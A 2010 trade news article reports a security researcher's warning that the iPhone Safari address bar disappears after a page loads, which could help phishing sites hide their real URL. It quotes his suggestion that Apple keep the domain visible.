FierceWirelessFierceWirelessEuropeFierceDeveloperFierceMobileContentFierceBroadbandWirelessFierceEnterpriseCommunicationsFierceIPTVFierceTelecomFierceOnlineVideoFierceCable

Free Newsletter

About | View Sample | Privacy
Related Topics >> iPhone | Apple | Mobile Web

Researcher warns against iPhone phishing threat

November 30, 2010 — 11:44am ET | By
Tools

Identity thieves can exploit the limited screen real estate on smartphones like Apple's (NASDAQ:AAPL) iPhone to fool users into believing they're visiting a legitimate mobile website, according to a warning issued by security researcher Nitesh Dhanjani. Writing on the SANS Application Security Street Fighter Blog, Dhanjani notes that while the address bar stays visible on an iPhone while the page renders, it immediately disappears as soon as it is rendered. Scammers could apply the same practice to conceal the actual URL of a fake site they've created, he explains. "Perhaps this may give the user some time to notice but it is not a reasonably reliable control (and I donʼt think Apple intended it to be)," Dhanjani contends. "I did contact Apple about this issue and they let me know they are aware of the implications but do not know when and how they will address the issue."

Dhanjani chalks up the issue to limited screen space on mobile devices. "This is most likely the primary reason why the address bar disappears upon page load on the iPhone. Note that on the iPhone, this only happens for websites that follow directives in HTML to advertise themselves as mobile sites... Since the address bar in Safari occupies considerable real estate, perhaps Apple may consider displaying or scrolling the current domain name right below the universal status bar (i.e. below the carrier and time stamp). Positioning the current domain context in a location that is unalterable by the rendered web content can provide the users similar indication that browsers such as IE and Chrome provide by highlighting the current domain being rendered."

Dhanjani adds that because most iOS applications are full-screen, developers should keep users immersed within their application instead of yanking the user out into Safari to render web content. "Given this situation, it becomes vital for iOS to provide consistency so the user can be ultimately assured what domain the web content is being rendered from," Dhanjani writes. "Given how rampant phishing and malware attempts are these days, I hope Apple chooses to not allow arbitrary web applications to scroll the real Safari address bar out of view."

For more:
- read this SANS blog entry

Related articles:
Apple's iOS 4.2 features new HTML5 and web standards support
Apple lifts restrictions on Flash development for iPhone


SHARE
WITH:
Email Twitter Facebook LinkedIn StumbleUpon
Get Your FREE FierceMobileContent Email Newsletter:


More stories about iPhone   Apple   Mobile Web